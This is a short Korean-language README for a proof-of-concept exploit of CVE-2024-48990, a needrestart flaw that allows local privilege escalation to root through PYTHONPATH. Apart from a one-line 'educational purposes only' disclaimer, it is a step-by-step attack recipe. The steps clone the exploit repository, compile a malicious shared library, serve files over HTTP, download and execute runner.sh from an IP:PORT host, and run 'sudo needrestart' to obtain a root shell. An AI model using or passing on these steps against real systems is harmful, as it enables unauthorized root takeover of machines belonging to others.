
CVE-2024-48990에 관한 PoC입니다. Qualys는 needrestart 3.8 이전 버전에서 로컬 공격자가 제어하는 PYTHONPATH 환경 변수를 이용해 needrestart가 Python 인터프리터를 실행하도록 속임으로써 루트 권한으로 임의 코드를 실행할 수 있음을 발견했습니다. (NIST)
[!WARNING] 이 파일과 정보는 교육 목적으로만 제공됩니다. 저자는 어떠한 악의적인 행위에 대해서도 책임을 지지 않습니다. 제공되는 모든 정보는 어떠한 종류의 범죄나 악용을 선동하기 위한 것이 아닙니다.
Qualys는 needrestart 3.8 이전 버전에서 로컬 공격자가 공격자가 제어하는 PYTHONPATH 환경 변수로 Python 인터프리터를 실행하도록 needrestart를 속여 루트 권한으로 임의 코드를 실행할 수 있음을 발견했습니다. 공식 세부 정보는 NIST에서 확인하세요.
git clone https://github.com/grecosamuel/CVE-2024-48990.git
gcc -shared -fPIC -o __init__.so exploit.c
python3 -m http.server
wget http://IP:PORT/runner.sh
chmod +x runner.sh
./runner.sh
sudo needrestart
[*] CVE module created가 표시되면 CTRL+C를 눌러 프로세스를 중지하고 셸을 획득하세요!